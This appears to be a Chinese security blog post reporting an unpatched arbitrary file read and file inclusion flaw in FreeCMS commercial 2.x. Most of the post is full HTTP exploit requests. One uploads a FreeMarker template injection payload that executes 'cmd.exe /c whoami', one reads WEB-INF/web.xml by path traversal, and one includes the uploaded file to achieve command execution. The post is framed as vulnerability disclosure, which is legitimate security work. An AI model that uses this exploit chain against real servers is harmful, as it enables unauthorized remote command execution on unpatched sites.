目录
技能展示
文章
日记
时间线
项目展示
分类
标签
Android Bash Burp C++ CS CTF DLL劫持 Docker Fastjson Fastjson2 FNV-1a FreeCMS FRP GetShell GitHub IPv6 Java JNDI John JS加密 JS逆向 K8s Kafka Kali lama-cleaner Linux mitmproxy MSF MySQL Nim Nmap NPS Office OID Payload Phar PHP phpMyAdmin POP链 PWN Pyinstaller Python RCE RSA Shellcode SNMP SQL注入 SSH SSRF Ubuntu USB Web Webshell Web安全 Windows XSS YAML Zookeeper 主机探测 代码审计 伪协议 免杀 内网 内网穿透 加密 加解密 参数 反序列化 反弹shell 命令 哈希碰撞 图像处理 域渗透 字符串逃逸 容器 密码学 密码破解 提权 数据库 文件上传 日志分析 未授权访问 权限维持 汇总 流量分析 消息队列 溯源 漏洞 漏洞分析 漏洞利用 端口扫描 编译 网络管理 资产探测 跨平台 运维 进程隐藏 逆向
目录
目录
400 字
2 分钟
FreeCMS 商业版 2.x 任意文件读取与文件包含漏洞
FreeCMS商业版2.x版存在任意文件读取和任意文件包含漏洞
一、报告概述
FreeCMS商业版2.x版存在任意文件读取和任意文件包含漏洞,攻击者可以通过任意文件读取漏洞配合任意文件包含漏洞获取服务器权限。
二、报告详情
(一)漏洞描述
FreeCMS商业版2.x版存在任意文件读取和任意文件包含漏洞,攻击者可以通过任意文件读取漏洞配合任意文件包含漏洞获取服务器权限。
(二)影响范围
FreeCMS商业版2.x版。
(三)验证方法
1. 文件上传
1POST /freecms/image.upload HTTP/1.12Host: 127.0.0.1:80803Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC1234User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.40 Safari/537.365Content-Length: 2456
7------WebKitFormBoundaryABC1238Content-Disposition: form-data; name="file"; filename="1.txt"9Content-Type: image/jpeg10
11<#assign value="freemarker.template.utility.Execute"?new()>${value("cmd.exe /c whoami")}12------WebKitFormBoundaryABC123—
2. 查看上传文件
1GET /upload/20250712/202507124.7353792948194275.txt HTTP/1.12Host: 127.0.0.1:80803User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.40 Safari/537.364Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.85Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26Accept-Encoding: gzip, deflate7DNT: 18Sec-GPC: 19Connection: close10Cookie: JSESSIONID=FAD00DDBD51EB9270FF15A07B3A5C08111Upgrade-Insecure-Requests: 112X-Forwarded-For: 127.0.0.113X-Originating-IP: 127.0.0.114X-Remote-IP: 127.0.0.115X-Remote-Addr: 127.0.0.116Priority: u=0, i
3. 任意文件读取
1POST /templetProFhtml.do HTTP/1.12Host: 127.0.0.1:80803User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.40 Safari/537.364Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.85Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26Accept-Encoding: gzip, deflate7DNT: 18Sec-GPC: 19Connection: close10Cookie: JSESSIONID=FAD00DDBD51EB9270FF15A07B3A5C08111Upgrade-Insecure-Requests: 112X-Forwarded-For: 127.0.0.113X-Originating-IP: 127.0.0.114X-Remote-IP: 127.0.0.115X-Remote-Addr: 127.0.0.116Priority: u=0, i17Content-Type: application/x-www-form-urlencoded18Content-Length: 6019
20siteFolder=FreeCMS&templetPath=info/../../../WEB-INF/web.xml
4. 配合FreeMarker模板注入命令执行
1POST /templetProFhtml.do HTTP/1.12Host: 127.0.0.1:80803User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.40 Safari/537.364Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.85Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26Accept-Encoding: gzip, deflate7DNT: 18Sec-GPC: 19Connection: close10Cookie: JSESSIONID=FAD00DDBD51EB9270FF15A07B3A5C08111Upgrade-Insecure-Requests: 112X-Forwarded-For: 127.0.0.113X-Originating-IP: 127.0.0.114X-Remote-IP: 127.0.0.115X-Remote-Addr: 127.0.0.116Priority: u=0, i17Content-Type: application/x-www-form-urlencoded18Content-Length: 8719
20siteFolder=FreeCMS&templetPath=/../../../upload/20250712/202507124.7353792948194275.txt
(四)修复建议
- 官方暂未修复该漏洞,建议对相关接口进行限制
FreeCMS 商业版 2.x 任意文件读取与文件包含漏洞
/posts/2025/09/freecms-file-read-and-include/ 部分信息可能已经过时
目录
技能展示
文章
日记
时间线
项目展示
分类
标签
Android Bash Burp C++ CS CTF DLL劫持 Docker Fastjson Fastjson2 FNV-1a FreeCMS FRP GetShell GitHub IPv6 Java JNDI John JS加密 JS逆向 K8s Kafka Kali lama-cleaner Linux mitmproxy MSF MySQL Nim Nmap NPS Office OID Payload Phar PHP phpMyAdmin POP链 PWN Pyinstaller Python RCE RSA Shellcode SNMP SQL注入 SSH SSRF Ubuntu USB Web Webshell Web安全 Windows XSS YAML Zookeeper 主机探测 代码审计 伪协议 免杀 内网 内网穿透 加密 加解密 参数 反序列化 反弹shell 命令 哈希碰撞 图像处理 域渗透 字符串逃逸 容器 密码学 密码破解 提权 数据库 文件上传 日志分析 未授权访问 权限维持 汇总 流量分析 消息队列 溯源 漏洞 漏洞分析 漏洞利用 端口扫描 编译 网络管理 资产探测 跨平台 运维 进程隐藏 逆向
目录